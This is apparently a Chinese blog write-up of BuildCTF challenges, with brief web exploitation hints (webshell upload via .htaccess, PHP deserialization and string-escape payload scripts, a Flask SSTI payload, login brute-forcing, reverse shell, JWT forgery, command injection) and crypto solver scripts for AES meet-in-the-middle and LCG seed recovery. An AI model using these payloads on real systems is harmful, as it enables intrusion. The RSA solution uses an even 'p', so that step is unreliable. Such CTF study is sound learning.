
BuildCTF


主要做web方向,misc和crypto有几题也看了一下

Web

ez!http

ez_md5

这里的 `$_REQUEST` 变量同时包含 GET 和 POST 的参数。值得注意的是,如果通过不同的方式给同一个变量名传入不同的值,`$_REQUEST` 只会保留最后处理的那个来源的值;处理顺序由 php.ini 的 request_order(未设置时为 variables_order)决定,常见配置下是 POST 覆盖同名的 GET。

我这谷歌hackbar发包有点问题,这里就可以

robots.txt知道了前几位,直接爆破md5,一下就爆破了

另外,传参时参数名要写成 Build[CTF.com,这是 PHP 参数名转换的问题

find-the-id

直接爆破即可

babyupload

上传.htaccess文件

上传木马

LovePopChain

pop链

<?php

// Property-only stand-ins. They presumably mirror the class and property
// names of the challenge source (not shown on this page); serialize() only
// records class names and property values, so no methods are needed here.
class MyObject
{
    public $NoLove;
    public $Forgzy;
}

class GaoZhouYue
{
    public $Yuer;
    public $LastOne;
}

class hybcx
{
    public $JiuYue;
    public $Si;
}

// Build the object graph: MyObject and hybcx reference each other, and
// GaoZhouYue is instantiated but never linked into the graph.
$entry = new MyObject();
$unlinked = new GaoZhouYue();
$link = new hybcx();

$link->Si = $entry;
$entry->NoLove = $link;
$entry->Forgzy = $link;

// Defensive takeaway: a chain like this only matters when the application
// passes request data to unserialize(). Prefer a data-only format such as
// JSON for untrusted input, or restrict unserialize() with its
// allowed_classes option.
echo urlencode(serialize($entry));

Why_so_serials?

字符串逃逸

<?php

/**
 * Replace every 'joker' with 'batman' in the given string.
 *
 * Each replacement makes the string one byte longer. When this runs on an
 * already serialized string, the s:N length prefixes written by serialize()
 * are not updated, so the declared lengths no longer match the data.
 */
function filter($str)
{
    $replaced = str_replace('joker', 'batman', $str);

    return $replaced;
}

class Gotham
{
    public $Bruce;
    // 19 repetitions of 'joker' followed by a 19-byte tail: after filter()
    // the value is 19 bytes longer than its recorded length, so the tail
    // falls outside the string and is parsed as serialized structure.
    public $Wayne = 'jokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjoker";s:5:"crime";b:1;}';
    public $crime = true;
}

$gotham = new Gotham();
$serialized = serialize($gotham);

// Print the serialized form before and after filtering so the length
// mismatch can be compared side by side.
// Defensive takeaway: never rewrite a string after serialize(); filter the
// field values first, and authenticate serialized blobs (e.g. with an HMAC)
// before they are unserialized.
echo $serialized;
echo filter($serialized);

tflock

扫描目录,得到admin的密码本和普通用户ctfer 123456

普通用户ctfer一直发包

再登admin就不会有锁进行爆破得到

RedFlag

buuctf-shrine

当config,self,( ) 都被过滤的时候,为了去获得讯息,必须去读一些全局变量。

如何绕过waf ? url_for 调取 current_app

url_for,在它引用的内容中,有着 current_app 的全局变量

{{url_for.globals['current_app'].config}}

eazyl0gin

toUpperCase() / toLowerCase()

特殊字符

'ı'.toUpperCase() == 'I'、'ſ'.toUpperCase() == 'S'、'K'.toLowerCase() == 'k'(这里的 'ı' 是 U+0131,'ſ' 是 U+017F,'K' 是开尔文符号 U+212A)

buildctf中i用这个特殊字符替代

md5直接解密密码即可

刮刮乐

bash里写入反弹shell

9002端口开放http服务

ez_waf

只对内容检查

填充垃圾数据可以绕过

蚁剑连接即可

sub

jwt伪造

访问page页面,file参数拼接命令rce

Misc

Hex的秘密

题目给出的字符串确实是16进制的,但每个字节都大于 7F,换算成10进制就是都大于 127,于是我们让每个字节都减去 128,再按 ASCII 解码

#!/usr/bin/python3

# Hex dump in which every byte has its high bit set (all values are > 0x7F).
s = 'c2f5e9ece4c3d4c6fbb3c5fafadfc1b5e3a1a1dfe2e9eee1f2f9f9f9fd'

# Decode the hex pairs to bytes, subtract 128 from each to clear the high bit,
# and map the result back to its ASCII character.
ls = [chr(byte - 128) for byte in bytes.fromhex(s)]
print(''.join(ls))

有黑客

查看流量包哥斯拉流量,推断XOR密钥,依次分析upload/shell.php的后几个包

拖进 CyberChef

什么?来玩玩心算吧

parselmouth-master工具

python沙箱逃逸

Crypto

mitm

中间相遇攻击

对明文做两次加密、对密文做两次解密,再比对两边得到的中间值

from Crypto.Util.number import *
from Crypto.Util.Padding import *
from hashlib import sha256
from Crypto.Cipher import AES
from random import *
from secret import flag

# Challenge source: a known 16-byte block is encrypted four times with
# AES-ECB, and the flag is encrypted under a key derived from all four round
# keys.
#
# Why this is weak: each round key is SHA-256 of a 3-byte string drawn from a
# 14-symbol alphabet, so there are only 14**3 = 2744 possible keys per round.
# Hashing does not add entropy, and with a known plaintext/ciphertext pair the
# four rounds can be split into two halves of 2744**2 combinations each.
note = b'Crypt_AES*42$@'
r = 4
keys = []

for _ in range(r):
    key = bytes(choices(note, k=3))
    digest = sha256(key).digest()
    # The raw key and its digest are printed as they are generated.
    print(key)
    print(digest)
    keys.append(digest)
print(keys)

leak = b'Hello_BuildCTF!!'
cipher = leak
for round_key in keys:
    # One full AES-ECB encryption of the single block per round key.
    cipher = AES.new(round_key, AES.MODE_ECB).encrypt(cipher)

# The flag key is the SHA-256 of the four round keys concatenated in order.
enc_key = sha256(b"".join(keys)).digest()
flag_cipher = AES.new(enc_key, AES.MODE_ECB)
enc_flag = flag_cipher.encrypt(pad(flag, AES.block_size))

print(f'cipher = {cipher}')
print(f'enc_flag = {enc_flag}')
# cipher = b'\xb9q\x04\xa3<\xf0\x11-\xe9\xfbo:\x9aQn\x81'
# enc_flag = b'q\xcf\x08$%\xb0\x86\xee\x1a(b\x7f\xf8\x86\xbd\xd0\xa7\xee\xd9\x9d2\x82a7H=a\x13\x87e\xad\xd2b\x8e\x07\xa5\xddo\xc0\xf3N\xd4b\xc9o\x88$\xc7\xf4p\xc1\x1e,\xed\xcc\x94\x8c\xf4\x00\xa5\xe0-\xf7\xc5'
from Crypto.Util.number import *
from itertools import product
from Crypto.Util.Padding import *
from hashlib import sha256
from Crypto.Cipher import AES
from tqdm import tqdm
from random import choices

note = b'Crypt_AES*42$@'
key_length = 3

# Enumerate every candidate round key: SHA-256 of each 3-byte string over the
# 14-symbol alphabet (14**3 = 2744 digests), then every ordered pair of them.
all_keys = [bytes(combo) for combo in product(note, repeat=key_length)]
digests = [sha256(raw).digest() for raw in all_keys]
key_pairs = [[first, second] for first in digests for second in digests]

r = 2
leak = b'Hello_BuildCTF!!'
cipher2 = b'\xb9q\x04\xa3<\xf0\x11-\xe9\xfbo:\x9aQn\x81'


def _run_rounds(block, round_keys, decrypt):
    """Apply the first ``r`` keys of *round_keys* to *block* with AES-ECB.

    Keys are used in list order in both directions, so for the decrypting
    side round_keys[0] undoes the LAST encryption round.
    """
    for round_key in round_keys[:r]:
        engine = AES.new(round_key, AES.MODE_ECB)
        block = engine.decrypt(block) if decrypt else engine.encrypt(block)
    return block


# Forward half: known plaintext encrypted under every key pair.
ciphers = []
cipher_keys = []
for keys in tqdm(key_pairs, desc="Encrypting"):
    ciphers.append(_run_rounds(leak, keys, decrypt=False))
    cipher_keys.append(keys)

# Backward half: published ciphertext decrypted under every key pair.
plains = []
plain_keys = []
for keys in tqdm(key_pairs, desc="Decrypting"):
    plains.append(_run_rounds(cipher2, keys, decrypt=True))
    plain_keys.append(keys)

# A value present in both lists is a middle state reachable from both ends.
common = set(ciphers).intersection(plains)

for item in common:
    index_plain = plains.index(item)
    index_cipher = ciphers.index(item)
    backward_pair = plain_keys[index_plain]
    forward_pair = cipher_keys[index_cipher]

    # NOTE: the backward pair is listed in decryption order (last round key
    # first); reverse it when assembling the four keys in encryption order.
    print(f'Common Item: {item}')
    print(f'Keys for Plain: {backward_pair}')
    print(f'Keys for Cipher: {forward_pair}')
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from hashlib import sha256

# Assume these values are known
# The four round-key digests in encryption order. Presumably these are the
# values printed by the meet-in-the-middle search; the page does not show
# that output.
keys = [
    b'T\xeb\x9f13\xa7w\x1ft`\x8e\xd5v\x80\xd8\x89\xf3\xf4-\xd7\xc2,\xec\x00\x85\x1b\xdd\x06\x1e\xce\xbe\x99',
    b'\xae\xe7\xc3\xff&k\x15\xc5Q\x89HD.\xb3\xb3\x83\x11:\xd2\x1e\x04\xfc\xb1\x00\x03DQ\x1eF\xc4r^',
    b'\xf0\xb6\x8c\x1f\x85\x9f\x1a\xff\xe7\xd1r\x9a\x0c\xf3\xc7"\x159+\x85\xc5\xc6\xe0\x9ef\x13\xd1\xf2\x9c\xb2B\xdf',
    b'%\x99f\x8f/\x93\x84X)\x8e\xfd\xb6(\x1f^>\xaf\xcd\xd4\xf3\xc0\xc2\x15\xef \x83X\xd6\x02\xa8~\x11',
]
# Same derivation as the challenge: SHA-256 over the concatenated round keys.
enc_key = sha256(b"".join(keys)).digest()
# Encrypted flag as published by the challenge.
enc_flag = b'q\xcf\x08$%\xb0\x86\xee\x1a(b\x7f\xf8\x86\xbd\xd0\xa7\xee\xd9\x9d2\x82a7H=a\x13\x87e\xad\xd2b\x8e\x07\xa5\xddo\xc0\xf3N\xd4b\xc9o\x88$\xc7\xf4p\xc1\x1e,\xed\xcc\x94\x8c\xf4\x00\xa5\xe0-\xf7\xc5'

decrypted_data = AES.new(enc_key, AES.MODE_ECB).decrypt(enc_flag)

try:
    # unpad() raises ValueError on malformed padding, which is the usual sign
    # of a wrong key; a failing decode() is a ValueError subclass and lands
    # in the same handler.
    recovered = unpad(decrypted_data, AES.block_size)
    print(f'Decrypted flag: {recovered.decode()}')
except ValueError:
    print("Incorrect decryption, possibly due to padding error.")

girls_band_cry_pto

参考:

六校梦幻联赛Crypto-CSDN博客

题目:

from Crypto.Util.number import *
import gmpy2


def getprime(kbit, FLAG):
    """Return a random kbit-bit prime used as the seed of a throwaway LCG.

    A linear congruential generator with prime multiplier ``a``, increment
    ``b`` (both kbit bits) and prime modulus ``N`` (kbit + 5 bits) is stepped
    ten times starting from the seed. When *FLAG* is truthy the ten outputs
    are printed; the seed itself is what gets returned.

    Security note: printing consecutive LCG outputs discloses the generator's
    state relations, so a value that must stay secret should not be used as
    the seed of a sequence that is published.
    """
    a = getPrime(kbit)
    b = getPrime(kbit)
    N = getPrime(kbit + 5)
    seed = getPrime(kbit)

    state = seed
    outputs = []
    for _ in range(10):
        state = (a * state + b) % N
        outputs.append(state)

    if FLAG:
        print(outputs)
    return seed



# Two 512-bit primes; only the first call prints its LCG output sequence.
p = getprime(512, 1)
q = getprime(512, 0)
n = p * q

# e is even, so it shares the factor 2 with p - 1 and q - 1 for odd primes
# and no ordinary RSA private exponent exists for it.
e = 1384626

flag = bytes_to_long(b'...')

# The message is kept below half the bit length of n, i.e. roughly below the
# size of a single prime factor.
assert flag.bit_length() < n.bit_length() // 2

c = pow(flag, e, n)

print('c=', c)

''''''
[37382128984932009103055100236038298684187701771245912912208816283882352432386956435965036367810667394024993955812239704879381327228911265588017046627348503, 78860822396220922181257740301787328387654351181949135165584053897837116358564567613593406267620270397593757280733139576593428399156673217202739776358215953, 71961258377748802736482119449608198361898650603044501972923193831637292104436919483148544126546157761435847502622416800596454167412705966674707485447149592, 87271087644907910379168026089161507515679859469787715709089631773745967695993043069981508275969979669395420678260957179827954920361899134388830957711827969, 72060448202158281754256475874109091993193239479491265267010728401711694585210195554635415348891139571830347004379216450772696235700910532153698412887476412, 198822737610698203376629161658629276556973499054887457432530950247888991546498594767954251786997515337433684733300663470799887569646159225800449429896258899, 186920895499932700150962847893153648403293237986492275627558112493385728113172211076262656795948951216023567806119078906412693819469136004563793414149643278, 56472634592713718635518027850351194341092172882542912776939953869983486542308422043454035086533070566859787384014556343587278097326244663175874047755695694, 42665120723108982921319232615099077060109901818313520605789700720605479528247045699344736360219784997528870841912999130951916510491705708498185762196467897, 205629005887807114384057131575309344114082007367662384600399313743755704623421415135564859072125246431180953419843187244789534372794288258609006920825136808]
c= 51846448616255629242918159354807752786692784645460532308823434086479848425723111371477823327980874708898952566998637230358105087254392989515438172155717708590176244736140994735777168368143405720703501031813936741444894000217727880068767785957507824708838189619286341612305393812568642372035793481458142583420
''''''

先求p,根据题目给的函数可知,p是LCG的原始seed

from Crypto.Util.number import *
from sympy import isprime

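def gcd(a, b):
    """Return a greatest common divisor of *a* and *b* (Euclid's algorithm).

    The loop performs the same remainder steps as the recursive formulation,
    so the result keeps the same sign behaviour (it can be negative when the
    inputs are negative; callers that need a modulus should take ``abs``).
    Iterating avoids RecursionError on operand pairs that need more
    remainder steps than the interpreter's recursion limit allows.
    """
    while b != 0:
        a, b = b, a % b
    return a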


s = [37382128984932009103055100236038298684187701771245912912208816283882352432386956435965036367810667394024993955812239704879381327228911265588017046627348503, 78860822396220922181257740301787328387654351181949135165584053897837116358564567613593406267620270397593757280733139576593428399156673217202739776358215953, 71961258377748802736482119449608198361898650603044501972923193831637292104436919483148544126546157761435847502622416800596454167412705966674707485447149592, 87271087644907910379168026089161507515679859469787715709089631773745967695993043069981508275969979669395420678260957179827954920361899134388830957711827969, 72060448202158281754256475874109091993193239479491265267010728401711694585210195554635415348891139571830347004379216450772696235700910532153698412887476412, 198822737610698203376629161658629276556973499054887457432530950247888991546498594767954251786997515337433684733300663470799887569646159225800449429896258899, 186920895499932700150962847893153648403293237986492275627558112493385728113172211076262656795948951216023567806119078906412693819469136004563793414149643278, 56472634592713718635518027850351194341092172882542912776939953869983486542308422043454035086533070566859787384014556343587278097326244663175874047755695694, 42665120723108982921319232615099077060109901818313520605789700720605479528247045699344736360219784997528870841912999130951916510491705708498185762196467897, 205629005887807114384057131575309344114082007367662384600399313743755704623421415135564859072125246431180953419843187244789534372794288258609006920825136808]

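# Differences between consecutive LCG outputs: t[i] = s[i + 1] - s[i].
# Indexing this as s[i] - s[i - 1] from i = 0 would wrap around to s[-1] and
# mix the last output into the first difference.
t = [s[i + 1] - s[i] for i in range(len(s) - 1)]

# Because t[i + 1] = a * t[i] (mod N), every t[i + 2] * t[i] - t[i + 1] ** 2
# is a multiple of N, so the gcd of two such values is N or a multiple of it.
# Start at i = 1 so that t[i - 1] is a real neighbour rather than t[-1].
all_n = []
for i in range(1, len(t) - 2):
    all_n.append(gcd(t[i + 1] * t[i - 1] - t[i] * t[i], t[i + 2] * t[i] - t[i + 1] * t[i + 1]))

# Folding every candidate together strips cofactors that a single gcd may
# still carry; this combined value is tried first.
combined = 0
for n in all_n:
    combined = gcd(combined, n)


def MMI(A, n):
    """Return the inverse of A modulo n, or -1 when A has no inverse."""
    old_r, r = A % n, n
    old_x, x = 1, 0
    while r:
        quotient = old_r // r
        old_r, r = r, old_r - quotient * r
        old_x, x = x, old_x - quotient * x
    return old_x % n if old_r == 1 else -1


# NOTE(review): the result recorded under this script ends in the digit 2,
# i.e. it is even and cannot be the prime seed; that is consistent with the
# wrap-around indexing and with only the last candidate being checked.
seed = None
for n in [combined] + all_n:
    n = abs(n)
    if n <= 1:
        continue
    step_inverse = MMI(s[1] - s[0], n)
    if step_inverse == -1:
        continue  # s[1] - s[0] is not invertible modulo this candidate
    a = (s[2] - s[1]) * step_inverse % n
    ani = MMI(a, n)
    if ani == -1:
        continue
    b = (s[1] - a * s[0]) % n
    # s[0] = a * seed + b (mod n), so step the generator back once.
    candidate = (ani * (s[0] - b)) % n

    # Check every candidate as it is produced instead of only the last one.
    if isprime(candidate):
        seed = candidate
        print(f"Found prime p: {seed}")
        break
    print(f"Seed is not prime: {candidate}")

print(seed)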

# 1306971501389667405355339984446001963306823960180518559102900074209906822479823648175928437467992667758988690268887352531564749276373500569799174613448137062
from Crypto.Util.number import *
import gmpy2

# 已知参数
p = 1306971501389667405355339984446001963306823960180518559102900074209906822479823648175928437467992667758988690268887352531564749276373500569799174613448137062
c = 51846448616255629242918159354807752786692784645460532308823434086479848425723111371477823327980874708898952566998637230358105087254392989515438172155717708590176244736140994735777168368143405720703501031813936741444894000217727880068767785957507824708838189619286341612305393812568642372035793481458142583420
e = 1384626

# Work modulo p only: invert e modulo p - 1 and raise c to that power.
# NOTE(review): the p assigned above ends in the digit 2, so it is even and
# cannot be the 512-bit prime returned by getprime(). e = 1384626 is even as
# well, so for any odd prime p it has no inverse modulo p - 1. Confirm the
# recovered p before relying on this step.
d = gmpy2.invert(e, p - 1)
m = pow(c, d, p)

flag = long_to_bytes(m)
print(flag)

# Printed a second time when the expected flag prefix is present.
has_prefix = b'BuildCTF' in flag
if has_prefix:
    print(flag)

BuildCTF{crypt0_15_s0_e@5y!}

From: https://www.cnblogs.com/1nnya/p/18516386
